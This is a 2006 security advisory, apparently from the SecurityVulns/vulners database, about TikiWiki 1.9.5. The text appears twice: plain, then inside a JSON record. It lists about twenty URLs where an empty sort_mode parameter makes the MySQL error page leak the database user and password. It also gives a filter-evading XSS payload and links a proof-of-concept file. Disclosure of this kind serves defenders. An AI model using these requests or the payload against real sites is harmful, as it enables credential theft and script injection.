/*==========================================*/
//tikiwiki version 1.9.5 (CVS) -Sirius- (PoC)
// Product: Tikiwiki
// URL: http://tikiwiki.org/
// RISK: critical
/*==========================================*/
there's a critical security bug in tikiwiki version 1.9.5 (CVS) -Sirius-
a anonymous user , can dump the mysql user & passwd just by creating a mysql error with the "sort_mode" var , with those following links :
/tiki-listpages.php?offset=0&sort_mode=
/tiki-lastchanges.php?days=1&offset=0&sort_mode=
/messu-archive.php?sort_mode=
/messu-mailbox.php?sort_mode=
/messu-sent.php?sort_mode=
/tiki-directory_add_site.php?sort_mode=
/tiki-directory_ranking.php?sort_mode=
/tiki-directory_search.php?sort_mode=
/tiki-forums.php?sort_mode=
/tiki-view_forum.php?forumId=
/tiki-friends.php?sort_mode=
/tiki-list_blogs.php?sort_mode=
/tiki-list_faqs.php?sort_mode=
/tiki-list_trackers.php?sort_mode=
/tiki-list_users.php?sort_mode=
/tiki-my_tiki.php?sort_mode=
/tiki-notepad_list.php?sort_mode=
/tiki-orphan_pages.php?sort_mode=
/tiki-shoutbox.php?sort_mode=
/tiki-usermenu.php?sort_mode=
/tiki-webmail_contacts.php?sort_mode=
a proof of concept is disponible here : http://cockor.free.fr/PoC.swf
there's also a xss here :
/tiki-featured_link.php?type=f&url=" ></iframe><scr</script>ipt>alert('XSS')</scri</script>pt> <!--
regards , securfrog
{"id": "SECURITYVULNS:DOC:14896", "bulletinFamily": "software", "title": "tikiwiki 1.9.5 mysql password disclosure & xss", "description": "/*==========================================*/\r\n//tikiwiki version 1.9.5 (CVS) -Sirius- (PoC)\r\n// Product: Tikiwiki \r\n// URL: http://tikiwiki.org/\r\n// RISK: critical\r\n/*==========================================*/\r\n\r\n\r\n\r\n\r\nthere's a critical security bug in tikiwiki version 1.9.5 (CVS) -Sirius-\r\na anonymous user , can dump the mysql user & passwd just by creating a mysql error with the "sort_mode" var , with those following links :\r\n/tiki-listpages.php?offset=0&sort_mode=\r\n/tiki-lastchanges.php?days=1&offset=0&sort_mode=\r\n/messu-archive.php?sort_mode=\r\n/messu-mailbox.php?sort_mode=\r\n/messu-sent.php?sort_mode=\r\n/tiki-directory_add_site.php?sort_mode=\r\n/tiki-directory_ranking.php?sort_mode=\r\n/tiki-directory_search.php?sort_mode=\r\n/tiki-forums.php?sort_mode=\r\n/tiki-view_forum.php?forumId=\r\n/tiki-friends.php?sort_mode=\r\n/tiki-list_blogs.php?sort_mode=\r\n/tiki-list_faqs.php?sort_mode=\r\n/tiki-list_trackers.php?sort_mode=\r\n/tiki-list_users.php?sort_mode=\r\n/tiki-my_tiki.php?sort_mode=\r\n/tiki-notepad_list.php?sort_mode=\r\n/tiki-orphan_pages.php?sort_mode=\r\n/tiki-shoutbox.php?sort_mode=\r\n/tiki-usermenu.php?sort_mode=\r\n/tiki-webmail_contacts.php?sort_mode=\r\n\r\na proof of concept is disponible here : http://cockor.free.fr/PoC.swf\r\n\r\nthere's also a xss here :\r\n/tiki-featured_link.php?type=f&url=" ></iframe><scr</script>ipt>alert('XSS')</scri</script>pt> <!--\r\n\r\nregards , securfrog ", "published": "2006-11-02T00:00:00", "modified": "2006-11-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14896", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:19", "edition": 1, "viewCount": 1234, "enchantments": {"score": {"value": -0.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6768"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6768"]}]}, "exploitation": null, "vulnersScore": -0.4}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645411895, "score": 1659803227}, "_internal": {"score_hash": "8c287a43815344f1fa9a7e6c86991d52"}}